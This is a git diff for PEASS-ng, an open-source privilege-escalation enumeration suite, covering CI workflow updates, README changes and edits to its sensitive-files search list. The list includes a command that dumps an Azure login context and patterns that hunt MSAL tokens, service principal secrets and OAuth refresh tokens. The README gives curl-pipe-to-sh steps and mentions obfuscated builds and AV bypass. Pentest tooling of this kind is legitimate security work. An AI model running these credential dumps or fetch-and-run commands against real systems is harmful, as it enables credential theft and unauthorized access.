Merge pull request #483 from securitytime/patch-1

Update Beaprint.cs
f
2025-07-01 16:23:13 +02:00 · 2025-07-01 12:12:01 +02:00 · 2025-07-01 11:10:21 +02:00 · 2025-06-28 09:12:40 +02:00 · 2025-06-25 01:59:43 +02:00 · 2025-06-25 01:59:03 +02:00
980 changed files with 89673 additions and 13012 deletions
--- a/.github/workflows/CI-master_tests.yml
+++ b/.github/workflows/CI-master_tests.yml
@ -4,11 +4,12 @@ on:
  push:
    branches:
      - master
      - main
    paths-ignore:
        - '.github/**'
  schedule:
-    - cron: "5 4 * * SUN"
+    - cron: "5 4 1 * *"
  workflow_dispatch:
@ -49,7 +50,7 @@ jobs:
      - name: run MSBuild
        run: msbuild $env:Solution_Path
-      # Execute all unit tests in the solution - It's broken :(
+      # Execute all unit tests in the solution
      #- name: Execute unit tests
      #  run: dotnet test $env:Solution_Path
@ -65,6 +66,50 @@ jobs:
            echo "build Any CPU"
            msbuild -m $env:Solution_Path /t:Rebuild /p:Configuration=$env:Configuration /p:Platform="Any CPU"
      - name: Execute winPEAS -h
        shell: pwsh
        run: |
          $Configuration = "Release"
          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
          if (Test-Path $exePath) {
            & $exePath -h
          } else {
            Write-Error "winPEAS.exe not found at $exePath"
          }
      - name: Execute winPEAS cloudinfo
        shell: pwsh
        run: |
          $Configuration = "Release"
          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
          if (Test-Path $exePath) {
            & $exePath cloudinfo
          } else {
            Write-Error "winPEAS.exe not found at $exePath"
          }
      - name: Execute winPEAS systeminfo
        shell: pwsh
        run: |
          $Configuration = "Release"
          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
          if (Test-Path $exePath) {
            & $exePath systeminfo
          } else {
            Write-Error "winPEAS.exe not found at $exePath"
          }
      - name: Execute winPEAS networkinfo
        shell: pwsh
        run: |
          $Configuration = "Release"
          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
          if (Test-Path $exePath) {
            & $exePath networkinfo
          } else {
            Write-Error "winPEAS.exe not found at $exePath"
          }
      # Copy the built versions
      - name: Copy all versions
        run: |
@ -99,52 +144,46 @@ jobs:
      # Upload all the versions for the release
      - name: Upload winpeasx64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx64.exe
          path: winPEAS\winPEASexe\binaries\x64\Release\winPEASx64.exe
      - name: Upload winpeasx86
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx86.exe
          path: winPEAS\winPEASexe\binaries\x86\Release\winPEASx86.exe
      - name: Upload winpeasany
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASany.exe
          path: winPEAS\winPEASexe\binaries\Release\winPEASany.exe
      - name: Upload winpeasx64ofs
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx64_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe
      - name: Upload winpeasx86ofs
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx86_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe
      - name: Upload winpeasanyofs
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASany_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe
      - name: Upload winpeas.bat
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEAS.bat
          path: winPEAS\winPEASbat\winPEAS.bat
      - name: Upload winpeas.ps1
        uses: actions/upload-artifact@v2
        with:
          name: winPEAS.ps1
          path: winPEAS\winPEASps1\winPEAS.ps1
      # Git add
      #- name: Create local changes
@ -189,7 +228,9 @@ jobs:
        run: |
          python3 -m pip install PyYAML
          cd linPEAS
-          python3 -m builder.linpeas_builder
+          python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
          python3 -m builder.linpeas_builder --all-no-fat --output linpeas.sh
          python3 -m builder.linpeas_builder --small --output linpeas_small.sh
      # Build linpeas binaries
      - name: Build linpeas binaries 
@ -207,35 +248,35 @@ jobs:
      # Run linpeas help as quick test
      - name: Run linpeas help
-        run: linPEAS/linpeas.sh -h
+        run: linPEAS/linpeas_fat.sh -h && linPEAS/linpeas.sh -h && linPEAS/linpeas_small.sh -h
      # Run linpeas as a test
      - name: Run linpeas system_information
-        run: linPEAS/linpeas.sh -o system_information -a
+        run: linPEAS/linpeas_fat.sh -o system_information -a
      - name: Run linpeas container
-        run: linPEAS/linpeas.sh -o container -a
+        run: linPEAS/linpeas_fat.sh -o container -a
      - name: Run linpeas cloud
-        run: linPEAS/linpeas.sh -o cloud -a
+        run: linPEAS/linpeas_fat.sh -o cloud -a
      - name: Run linpeas procs_crons_timers_srvcs_sockets
-        run: linPEAS/linpeas.sh -o procs_crons_timers_srvcs_sockets -a
+        run: linPEAS/linpeas_fat.sh -o procs_crons_timers_srvcs_sockets -a
      - name: Run linpeas network_information
-        run: linPEAS/linpeas.sh -o network_information -t -a
+        run: linPEAS/linpeas_fat.sh -o network_information -t -a
      - name: Run linpeas users_information
-        run: linPEAS/linpeas.sh -o users_information -a
+        run: linPEAS/linpeas_fat.sh -o users_information -a
      - name: Run linpeas software_information
-        run: linPEAS/linpeas.sh -o software_information -a
+        run: linPEAS/linpeas_fat.sh -o software_information -a
      - name: Run linpeas interesting_perms_files
-        run: linPEAS/linpeas.sh -o interesting_perms_files -a
+        run: linPEAS/linpeas_fat.sh -o interesting_perms_files -a
      - name: Run linpeas interesting_files
-        run: linPEAS/linpeas.sh -o interesting_files -a
+        run: linPEAS/linpeas_fat.sh -o interesting_files -a
      # Too much time
      #- name: Run linpeas api_keys_regex
@ -243,51 +284,57 @@ jobs:
      # Upload files for release
      - name: Upload linpeas.sh
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas.sh
          path: linPEAS/linpeas.sh
      - name: Upload linpeas_fat.sh
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_fat.sh
          path: linPEAS/linpeas_fat.sh
      - name: Upload linpeas_small.sh
        uses: actions/upload-artifact@v4
        with:
          name: linpeas_small.sh
          path: linPEAS/linpeas_small.sh
      ## Linux bins
      - name: Upload linpeas_linux_386
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_386
          path: sh2bin/builds/linpeas_linux_386
      - name: Upload linpeas_linux_amd64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_amd64
          path: sh2bin/builds/linpeas_linux_amd64
      - name: Upload linpeas_linux_arm
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_arm
          path: sh2bin/builds/linpeas_linux_arm
      - name: Upload linpeas_linux_arm64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_arm64
          path: sh2bin/builds/linpeas_linux_arm64
      ## Darwin bins
      - name: Upload linpeas_darwin_amd64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_darwin_amd64
          path: sh2bin/builds/linpeas_darwin_amd64
      - name: Upload linpeas_darwin_arm64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_darwin_arm64
          path: sh2bin/builds/linpeas_darwin_arm64
@ -321,14 +368,14 @@ jobs:
      # Build linpeas
      - name: Build macpeas
        run: |
-          python3 -m pip install PyYAML
+          python3 -m pip install PyYAML --break-system-packages
-          python3 -m pip install requests
+          python3 -m pip install requests --break-system-packages
          cd linPEAS
-          python3 -m builder.linpeas_builder
+          python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
      # Run linpeas help as quick test
      - name: Run macpeas help
-        run: linPEAS/linpeas.sh -h
+        run: linPEAS/linpeas_fat.sh -h
      # Run macpeas parts to test it
      #- name: Run macpeas
@ -342,77 +389,82 @@ jobs:
    steps:
    # Download files to release
    - name: Download winpeasx64ofs
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx64_ofs.exe
    - name: Download winpeasx86ofs
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx86_ofs.exe
    - name: Download winpeasanyofs
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASany_ofs.exe
    - name: Download winpeasx64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx64.exe
    - name: Download winpeasx86
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx86.exe
    - name: Download winpeasany
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASany.exe
    - name: Download winpeas.bat
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEAS.bat
    - name: Download linpeas.sh
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas.sh
    - name: Download linpeas_fat.sh
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_fat.sh
    - name: Download linpeas_small.sh
      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_small.sh
    - name: Download linpeas_linux_386
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_386
    - name: Download linpeas_linux_amd64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_amd64
    - name: Download linpeas_linux_arm
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_arm
    - name: Download linpeas_linux_arm64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_arm64
    - name: Download linpeas_darwin_amd64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_darwin_amd64
    - name: Download linpeas_darwin_arm64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_darwin_arm64
--- a/.github/workflows/aicoder.yml
+++ b/.github/workflows/aicoder.yml
@ -1,23 +0,0 @@
 name: aicoder
 on:
  workflow_dispatch:
 jobs:
  Build_and_test_winpeas_master:
    runs-on: ubuntu-latest
    steps:
      # checkout
      - name: AICoder GH Action
        uses: AICoderHub/GH_Action@v0.11
        with:
          INPUT_MODE: 'file-optimizer'
          INPUT_PROMPT: ''
          INPUT_OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          INPUT_MODEL: 'gpt-4'
          TEMPLATE_FILES: ''
          ORIGIN_BRANCH: 'aicoder'
          TO_BRANCH: 'master'
          CHECK_PATH: './parsers/json2pdf.py'
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
--- a/.github/workflows/artifacts_cleanup.yml
+++ b/.github/workflows/artifacts_cleanup.yml
@ -0,0 +1,14 @@
 name: 'nightly artifacts cleanup'
 on:
  schedule:
    - cron: '0 6 * * 2' # At 6am on Tuesdays
  workflow_dispatch:
 jobs:
  delete-artifacts:
    runs-on: ubuntu-latest
    steps:
      - uses: kolpav/purge-artifacts-action@v1
        with:
          token: ${{ secrets.GITHUB_TOKEN }}
          expire-in: 1days # Set this to 0 to delete all artifacts
--- a/.gitignore
+++ b/.gitignore
@ -1,4 +1,5 @@
 .vs/*
 .vscode/*
 winPEAS/winPEASexe/.vs/*
 v16/*
 winPEAS/winPEASexe/.vs/winPEAS/v16/*
@ -24,6 +25,8 @@ __pycache__
 linPEAS/builder/__pycache__/*
 linPEAS/builder/src/__pycache__/*
 linPEAS/linpeas.sh
 linPEAS/builder/linpeas_base_tmp.sh
 build_lists/regexes.yaml
 sh2bin
 sh2bin/*
 .dccache
--- a/AICoder.py
+++ b/AICoder.py
@ -1,208 +0,0 @@
 import argparse
 import os
 import sys
 import string
 import random
 from typing import List
 import openai
 import json
 import subprocess
 import tiktoken
 import requests
 from github import Github
 #########################
 #### OPENAI FUNCTIONS ###
 #########################
 def reportTokens(prompt, model="gpt-4"):
    encoding = tiktoken.encoding_for_model(model)
    print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
 def write_file(file_path: str, content: str):
    """Write content to a file creating the needed directories first"""
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    with open(file_path, "w") as file:
        file.write(content)
 def delete_file(file_path: str):
    """Delete a file if it exists"""
    if os.path.isfile(file_path):
        os.remove(file_path)
 openai_available_functions = {
    "write_file": write_file, "delete_file": delete_file
 }
 openai_functions = [
    {
        "name": "write_file",
        "description": "Write a file giving the path and the content",
        "parameters": {
            "type": "object",
            "properties": {
                "file_path": {
                    "type": "string",
                    "description": "Path to the file to write",
                },
                "content": {
                    "type": "string",
                    "description": "Content to write in the file",
                },
            },
            "required": ["file_path", "content"],
        },
    },
    {
        "name": "delete_file",
        "description": "Delete a file",
        "parameters": {
            "type": "object",
            "properties": {
                "file_path": {
                    "type": "string",
                    "description": "Path to the file to write",
                }
            },
            "required": ["file_path"],
        },
    }
 ]
 #########################
 #### GIT FUNCTIONS ######
 #########################
 def create_pull_request(branch_name, commit_message, github_token):
    github = Github(github_token)
    repo = github.get_repo(os.environ["GITHUB_REPOSITORY"])
    # Create a new branch
    base_branch = repo.get_branch(repo.default_branch)
    repo.create_git_ref(ref=f"refs/heads/{branch_name}", sha=base_branch.commit.sha)
    # Commit changes to the new branch
    subprocess.run(["git", "checkout", branch_name])
    subprocess.run(["git", "add", "."])
    subprocess.run(["git", "commit", "-m", commit_message])
    subprocess.run(["git", "push", "origin", branch_name])
    # Create a pull request
    pr = repo.create_pull(
        title=commit_message,
        body="Generated by OpenAI Github Action",
        head=branch_name,
        base=repo.default_branch
    )
    return pr.html_url
 #########################
 #### FILE PROCESSING ####
 #########################
 def process_file(prompt: str, api_key: str, file_path: str, model: str="gpt-4") -> str:
    with open(file_path, "r") as file:
        file_content = file.read()
    messages = [
        {"role": "system", "content": f"You are a developer and your goal is to generate code. The user will ask you to improve and modify some code. Your response must be a valid JSON with the path of each file to write as keys and the content of the files as values. Several files can be written at the same time."},
        {"role": "user", "content": prompt},
        {"role": "user", "content": f"This is the code from the file '{file_path}':\n\n{file_content}"}
    ]
    openai.api_key = api_key
    reportTokens(f"This is the code from the file '{file_path}':\n\n{file_content}")
    response = openai.ChatCompletion.create(
        model=model,
        messages=messages,
        temperature=0
    )
    response_message = response["choices"][0]["message"]
     # Step 2: check if GPT wanted to call a function
    if response_message.get("function_call"):
        function_name = response_message["function_call"]["name"]
        fuction_to_call = openai_available_functions[function_name]
        function_args = json.loads(response_message["function_call"]["arguments"])
        fuction_to_call(**function_args)
 def process_folder(prompt: str, api_key: str, folder_path: str, model: str="gpt-4") -> List[str]:
    responses = []
    for root, _, files in os.walk(folder_path):
        for file in files:
            file_path = os.path.join(root, file)
            response = process_file(prompt, api_key, file_path, model)
            responses.append(response)
 #########################
 #### MAIN FUNCTION ######
 #########################
 def get_random_string(length):
    # With combination of lower and upper case
    letters = string.ascii_letters
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str
 def main(prompt: str, api_key: str, file_path: str, github_token: str, model: str="gpt-4"):
    if os.path.isfile(file_path):
        process_file(prompt, api_key, file_path, model)
    elif os.path.isdir(file_path):
        process_folder(prompt, api_key, file_path, model)
    else:
        print("Error: Invalid file path.")
        sys.exit(1)
    try:
        create_pull_request(get_random_string(5), f"Modified {file_path}", github_token)
    except Exception as e:
        print(f"Error: Failed to create pull request. {e}")
        sys.exit(1)
 if __name__ == "__main__":
    # Setup the argument parser
    parser = argparse.ArgumentParser()
    # Add arguments for prompt, api_key, file_path and github_token
    parser.add_argument('--prompt', default=None, type=str, help='Input prompt')
    parser.add_argument('--api-key', default=None, type=str, help='Input API key')
    parser.add_argument('--path', default=None, type=str, help='Input file/folder path')
    parser.add_argument('--github-token', default=None, type=str, help='Github token')
    parser.add_argument('--model', default="gpt-4", type=str, help='Model to use')
    # Parse the arguments
    args = parser.parse_args()
    prompt = os.environ.get("INPUT_PROMPT", args.prompt)
    api_key = os.environ.get("INPUT_API_KEY", args.api_key)
    file_path = os.environ.get("INPUT_FILE_PATH", args.path)
    github_token = os.environ.get("GITHUB_TOKEN", args.github_token)
    model = os.environ.get("INPUT_MODEL", args.model)
    if not prompt or not api_key or not file_path:
        print("Error: Missing required inputs.")
        sys.exit(1)
    #if not github_token:
    #    print("Error: Missing github token.")
    #    sys.exit(1)
    if os.path.exists(prompt):
        with open(prompt, "r") as file:
            prompt = file.read()
    if prompt.startswith("http"):
        prompt = requests.get(prompt).text
    main(prompt, api_key, file_path, github_token, model)
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@ -1,19 +1,19 @@
 # Contributing to this repository
 ## Making Suggestions 
-If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**
+If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/peass-ng/PEASS-ng/issues)**
 ## Do don't know how to help?
-Check out the **[TODO](https://github.com/carlospolop/PEASS-ng/blob/master/TODO.md) page**
+Check out the **[TODO](https://github.com/peass-ng/PEASS-ng/blob/master/TODO.md) page**
 ## Searching for files with sensitive information
-From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** file.
+From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** file.
-If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file.
+If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file.
 Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud.
 ## Specific LinPEAS additions
-From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*.
+From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that will be merged into linpeas.sh*.
 The new linpeas.sh script will be auto-generated in the PR.
 ## Specific WinPEAS additions
--- a/2
+++ b/2
@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which peass-ng is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
-peass-ng is (C) 2006-2022 Carlos Polop Martin.
+peass-ng is (C) 2019-2024 Carlos Polop Martin.
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/README.md
+++ b/README.md
@ -1,6 +1,6 @@
 # PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation
-![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/peass.png)
+![](https://github.com/peass-ng/PEASS-ng/raw/master/linPEAS/images/peass.png)
 ![](https://img.shields.io/badge/Black-Arch-black) ![](https://img.shields.io/badge/Arch-AUR-brightgreen) ![](https://img.shields.io/badge/Black%20Hat%20Arsenal-Asia%202020-red)
@ -12,34 +12,29 @@ Here you will find **privilege escalation tools for Windows and Linux/Unix\* and
 These tools search for possible **local privilege escalation paths** that you could exploit and print them to you **with nice colors** so you can recognize the misconfigurations easily.
- Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)**
+- Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html)**
- **[WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)**
+- **[WinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)**
- Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)**
+- Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html)**
- **[LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
+- **[LinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
 ## JSON, HTML & PDF output
 Check the **[parsers](./parsers/)** directory to **transform PEASS outputs to JSON, HTML and PDF**
-## Support PEASS-ng and HackTricks and get benefits
+## Join us!
-Do you want to have **access the latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop?frequency=one-time) for individuals and companies**.
+If you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**
 **LinPEAS, WinPEAS and MacPEAS** aren’t enough for you? Welcome [**The PEASS Family**](https://opensea.io/collection/the-peass-family/), a limited collection of [**exclusive NFTs**](https://opensea.io/collection/the-peass-family/) of our favourite PEASS in disguise, designed by my team. Go **get your favourite and make it yours!** And if you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**
 You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).
 ## Let's improve PEASS together
-If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/CONTRIBUTING.md)** file.
+If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/peass-ng/PEASS-ng/blob/master/CONTRIBUTING.md)** file.
 ## Advisory
 All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
 By Polop<sup>(TM)</sup>
--- a/TODO.md
+++ b/TODO.md
@ -1,7 +1,7 @@
 # TODO
 ### Generate Nice Reports
- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/carlospolop/PEASS-ng/tree/master/parser).
+- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/peass-ng/PEASS-ng/tree/master/parser).
 - [ ] Create a python script that generates a nice HTML/PDF from the JSON output
 ### Generate a DB of Known Vulnerable Binaries
--- a/build_lists/regexes.yaml
+++ b/build_lists/regexes.yaml
@ -1,2 +1,3 @@
-This is a placeholder.
+# This is a placeholder
-To fill this yaml execute one of the scripts download_regexes.py or download_regexes.ps1
+# It will be replaced by the actual regexes.yaml file
 # generated by download-regexes.py or download-regexes.ps1 (execute it before building the tools)
--- a/build_lists/sensitive_files.yaml
+++ b/build_lists/sensitive_files.yaml
@ -1271,6 +1271,8 @@ search:
    value:
        config:
          auto_check: True
          exec:
            - '(pwsh -Command "Save-AzContext -Path /tmp/az-context3489ht.json" && cat /tmp/az-context3489ht.json && rm /tmp/az-context3489ht.json) || echo_not_found "pwsh"'
        files:
          #- name: "credentials"
@ -1379,13 +1381,54 @@ search:
                  - common
          - name: "AzureRMContext.json"
            value:
                bad_regex: "Id.*|Credential.*"
                type: f
                search_in: 
                  - common
          - name: "clouds.config"
            value: 
                type: f
                search_in: 
                  - common
          - name: "service_principal_entries.json"
            value: 
                bad_regex: ".*"
                type: f
                search_in: 
                  - common
-          - name: "ErrorRecords" #Azure logs can contain creentials
+          - name: "msal_token_cache.json"
            value: 
                bad_regex: ".*"
                type: f
                search_in: 
                  - common
          - name: "msal_http_cache.bin"
            value: 
                just_list_file: True
                type: f
                search_in: 
                  - common
          - name: "service_principal_entries.bin"
            value: 
                just_list_file: True
                type: f
                search_in: 
                  - common
          - name: "msal_token_cache.bin"
            value: 
                just_list_file: True
                type: f
                search_in: 
                  - common
          - name: "ErrorRecords" #Azure logs can contain crentials
            value: 
                type: d
                search_in: 
@ -1419,6 +1462,26 @@ search:
                search_in: 
                  - common
          - name: "Google Cloud Directory Sync"
            value: 
                files:
                  - name: "*.xml"
                    value:
                        bad_regex: "oAuth2RefreshToken.*|authCredentialsEncrypted.*"
                type: d
                search_in: 
                  - common
          - name: "Google Password Sync"
            value: 
                files:
                  - name: "*.xml"
                    value:
                        bad_regex: "baseDN.*|authorizeUsername.*"
                type: d
                search_in: 
                  - common
  - name: Road Recon
    value:
@ -1438,7 +1501,7 @@ search:
        config:
          auto_check: True
          exec:
-            - ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting"; fi
+            - ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.wiki/en/linux-hardening/freeipa-pentesting.html"; fi
        files:
          - name: "ipa"
--- a/linPEAS/README.md
+++ b/linPEAS/README.md
@ -1,10 +1,10 @@
 # LinPEAS - Linux Privilege Escalation Awesome Script
-![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)
+![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)
-**LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)**
+**LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html)**
-Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)**.
+Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html)**.
 [![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/309566)
@ -12,12 +12,28 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks
 Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed**
 ## Build your own linpeas!
 The latest version of linpeas allows you to **select the checks you would like your linpeas to have** and built it only with those checks!
 This allows to create **smaller and faster linpeas scripts** for stealth and speed purposes.
 Check how to **select the checks you want to build [in your own linpeas following this link.](builder)**
 Note that by default, in the releases pages of this repository, you will find a **linpeas with all the checks**.
 ## Differences between `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
 - **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
 - **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
 - **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
 ```bash
-# From github
+# From public github
-curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
+curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
 ```
 ```bash
@ -42,11 +58,24 @@ less -r /dev/shm/linpeas.txt #Read with colors
 ```bash
 # Use a linpeas binary
-wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
+wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64
 chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```
 ## AV bypass
